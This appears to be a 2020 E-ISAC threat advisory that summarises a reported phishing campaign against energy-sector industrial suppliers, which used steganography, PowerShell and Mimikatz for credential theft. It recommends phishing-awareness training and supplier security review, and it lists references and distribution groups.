In May of 2020, cyber security firm Kaspersky reported a form of malware allegedly targeting the supply chains of industrial organizations in the energy sector in Italy, the UK and Germany.
Initial delivery is though a phishing email specifically catered to its target and contains a malicious MS Office document. When a user interacts with the document, a script is triggered that downloads an image which contains the new malware hidden in the image. Using steganography to hide code in images is known attack technique because of its effectivesness; code imbedded in images is difficult for antivirus and other IDS devices to detect. The image file then executes a PowerShell script that eventually leverages Mimikatz to steal Windows credentials.
Potential impacts from targeted malware of this nature can result in disclosure of legitimate network credentials to an adversary. Adversaries use these credentials to “live off the land” in a target’s environment in part because misuse of legitimate network credentials is difficult to detect.
MITRE ATT@CK Mapping:
What to Do:
A robust and ongoinig cyber security awareness program that includes training personnel on how to recognize and report phishing and suspicious emails can assist in stopping malicious emails from entering your envinronments. Additionally, evaluating and understanding the cyber security program at trusted suppliers is important in maintaining a relationship built on mutual trust.
Kovacs, Eduard (2020). Industrial Suppliers in Japan, Europe Targeted in Sophisticated Attacks. Retrieved May 28, 2020. Retrieved from https://www.securityweek.com/industrial-suppliers-japan-europe-targeted-sophisticated-attacks?&web_view=true
Goodin, Dan. (2020). An advanced and unconventional hack is targeting industrial firms. May 30, 2020. Retrieved from https://arstechnica.com/information-technology/2020/05/an-advanced-and-unconventional-hack-is-targeting-industrial-firms/
Steganography in Targeted Attacks on Indutrial Enterprises. Retrieved from https://ics-cert.kaspersky.com/reports/2020/05/28/steganography-in-targeted-attacks-on-industrial-enterprises/
- Canadian CERTs
- CRISP - Cyber Risk Info Sharing Program
- DHS - NICC, NCCIC, US-CERT, etc
- DOE Complex
- E-ISAC AOO Members
- E-ISAC Staff
- FBI, LE Fusion
- FERC - OEIS, etc
- International (other ISACs, CERTs)
- Other (inc. local/state commissions)
- Trade Organizations
- Watch Floor
- E-ISAC Staff, 06/08/2020